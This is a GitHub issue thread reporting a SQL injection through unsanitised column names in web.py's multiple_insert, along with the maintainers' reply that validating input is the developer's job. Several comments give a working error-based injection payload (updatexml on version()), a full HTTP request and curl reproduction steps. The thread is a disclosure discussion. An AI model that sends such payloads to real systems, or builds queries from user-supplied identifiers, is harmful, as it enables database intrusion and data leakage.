### ISSUE TITLE
Table name exists injection

### ISSUE THREAD

**Issue by MisakiKata** [webpy/webpy#654]
Table name exists injection

When calling `db.multiple_insert` to insert data, the internally implemented SQL statement uses the form of splicing as follows

```
    def multiple_insert(self, tablename, values, seqname=None, _test=False):
        """
        Inserts multiple rows into `tablename`. The `values` must be a list of
        dictionaries, one for each row to be inserted, each with the same set
        of keys. Returns the list of ids of the inserted rows.
        Set `seqname` to the ID if it's not the default, or to `False`
        if there isn't one.

            >>> db = DB(None, {})
            >>> db.supports_multiple_insert = True
            >>> values = [{"name": "foo", "email": "foo@example.com"}, {"name": "bar", "email": "bar@example.com"}]
            >>> db.multiple_insert('person', values=values, _test=True)
            <sql: "INSERT INTO person (email, name) VALUES ('foo@example.com', 'foo'), ('bar@example.com', 'bar')">
        """
        if not values:
            return []

        if not self.supports_multiple_insert:
            out = [
                self.insert(tablename, seqname=seqname, _test=_test, **v)
                for v in values
            ]
            if seqname is False:
                return None
            else:
                return out

        keys = values[0].keys()
        # @@ make sure all keys are valid

        for v in values:
            if v.keys() != keys:
                raise ValueError("Not all rows have the same keys")

        # enforce query order for the above doctest compatibility with Py3
        keys = sorted(keys)

        sql_query = SQLQuery(
            "INSERT INTO %s (%s) VALUES " % (tablename, ", ".join(keys))
        )

        for i, row in enumerate(values):
            if i != 0:
                sql_query.append(", ")
            SQLQuery.join(
                [SQLParam(row[k]) for k in keys],
                sep=", ",
                target=sql_query,
                prefix="(",
                suffix=")",
            )

```

When the values parameter is passed by the front-end combination, the current end passes in a json value like `{"title":"admin","content":"admin"}` to the text parameter`db.multiple_insert("entries" , [text])`. The form of the insert statement is `"INSERT INTO %s (%s) VALUES"% (tablename, ", ".join(keys))`, which causes injection on the table name. There are special symbol filtering and string conversion on the parameters, but the table name is not processed

Input parameters:

```
{"title": "222222","content)%20VALUES%20('admin'%20or%20updatexml(1,concat(0x7e,(version())),0)%20or%20'')%3b#(": "qweqwe"}
```

sql_query：

`<class 'tuple'>: (<sql: "INSERT INTO entries (content) VALUES ('admin' or updatexml(1,concat(0x7e,(version())),0) or '');#(, title) VALUES ('qweqwe', '222222')">, <sql: 'SELECT last_insert_id();'>)`

Finally, it will report an error and execute the sql statement:

`pymysql.err.InternalError: (1105, "XPATH syntax error: '~5.7.26'")`

So, is it possible not to use splicing or to filter the table name as well

**Comment by iredmail** [comment]
Could you give us a complete Python code snippet to reproduce this issue?

**Comment by MisakiKata** [comment]
@iredmail The code is Code Examples blog, Transmission of json format field, in order to facilitate me to use the form of parameter name transmission: 
```
    def POST(self):
        # form = self.form()
        # if not form.validates():
            # return render.new(form)
        # model.new_post(form.d.title, form.d.content)
        # raise web.seeother("/")
		
        data = web.input()
        data1 = model.new_post(json.loads(data.str))
        return data1
```
model.py
```
def new_post(text):
    # db.insert(
        # "entries", title=title, content=text, posted_on=datetime.datetime.utcnow()
    # )
	
	return db.multiple_insert("entries" , [text])
```
The request method is：
```
POST /new HTTP/1.1
Host: 10.102.45.112:8080
Content-Length: 127
Cache-Control: max-age=0
Origin: http://10.102.45.112:8080
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close

str={"title": "222222","content)%20VALUES%20('admin'%20or%20updatexml(1,concat(0x7e,(version())),0)%20or%20'')%3b#(": "qweqwe"}
```

**Comment by iredmail** [comment]
Probably the most important rule for web development: do not trust the data submitted by user.
Your code is extremely dangerous because you don't check/validate user input at all, such SQL injection is expected.

Could you please create a simple web.py app which i can run with command `python app.py`, and give me full `curl` command used to reproduce the issue?

**Comment by iredmail** [comment]
What's the full `curl` command you used to send the POST data?

**Comment by MisakiKata** [comment]
curl:
`curl -i -X POST http://10.102.45.112:8080/new --data "str={\"title\": \"222222\",\"content)%20VALUES%20('admin'%20or%20updatexml(1,concat(0x7e,(version())),0)%20or%20'')%3b#(\": \"qweqwe\"}"`
Do you need app.py?

**Comment by iredmail** [comment]
> Do you need app.py? @iredmail

Not necessary. I can reproduce this issue now.

**Comment by MisakiKata** [comment]
ok
Can this issue be fixed?

**Comment by iredmail** [comment]
1. web.py already escape strings in column value, but not in column name. This causes this "issue".
1. I don't think this is an issue of web.py right now, because:
  1. you trust user input and use whatever user submitted as SQL column name.
  1. The result of `json.loads()` is not ready for SQL commands at all.

In your case, the `text` is a dict with 2 items, the 2nd key contains white spaces and other symbols:

```
{
    'title': '222222',
    "content) VALUES ('admin' or updatexml(1,concat(0x7e,(version())),0) or '');#(": 'qweqwe'
}
```

Ideally, web.py should smartly escape the whitespaces and other symbols to make it a safe sql column name.

@cclauss @anandology  Here's my code used to reproduce this issue.

```
import json
import web

urls = (
    '/', 'hello'
)
app = web.application(urls, globals())

class hello:
    def POST(self):
        data = web.input()
        data1 = new_post(json.loads(data.str))
        return data1

def new_post(text):
    db = web.DB(None, {})
    db.supports_multiple_insert = True
    sql = db.multiple_insert("entries", [text], _test=True)
    print(sql)
    return "OK"


if __name__ == "__main__":
    app.run()
```

Save the strings in a file named `temp.txt`:

```
str={"title": "222222","content)%20VALUES%20('admin'%20or%20updatexml(1,concat(0x7e,(version())),0)%20or%20'')%3b#(": "qweqwe"}
```

- Start the app with command `python3 app.py`.
- Send data with curl:

```
curl -X POST --data-binary "@temp.txt" http://127.0.0.1:8080
```

**Comment by MisakiKata** [comment]
I think what you said makes sense. `json.loads` is to simulate the transmission of a json, to solve the type format problem. In most cases, we have no way to determine the programmer's security awareness, just like web.py has done a lot of escape strings for security. So, can do complete security processing for some unconscious scenes, instead of only performing security processing on a part after transmission identification?

**Comment by iredmail** [comment]
User input is not trustable unless the program is only used by yourself. You have to specify the SQL column names in your code, and web.py helps handle the values.
I think we can close this issue now.

**Comment by anandology** [comment]
On Wed, Jul 8, 2020 at 6:09 PM iRedMail <notifications@github.com> wrote:

> User input is not trustable unless the program is only used by yourself.
> You have to specify the SQL column names in your code, and web.py helps
> handle the values.
> I think we can close this issue now.
>
That is correct. If the query is constucted using the user inputs
(including taking the table or column names) from the users, then the
developer should sanitize the input before passing it to web.py.

This issue not specific to multiple_insert, but also applies to insert and
where too.

>>> import web
>>> db = web.database("postgres:///testdb")
>>> d = {"title":
"222222","content)%20VALUES%20('admin'%20or%20updatexml(1,concat(0x7e,(version())),0)%20or%20'')%3b#(":
"qweqwe"}
>>> q = db.where('test', **d, _test=True)
>>> q.items
['SELECT ', '*', ' ', 'FROM ', 'test', ' ', 'WHERE ',
"content)%20VALUES%20('admin'%20or%20updatexml(1,concat(0x7e,(version())),0)%20or%20'')%3b#(
= ", <param: 'qweqwe'>, ' AND ', 'title = ', <param: '222222'>]
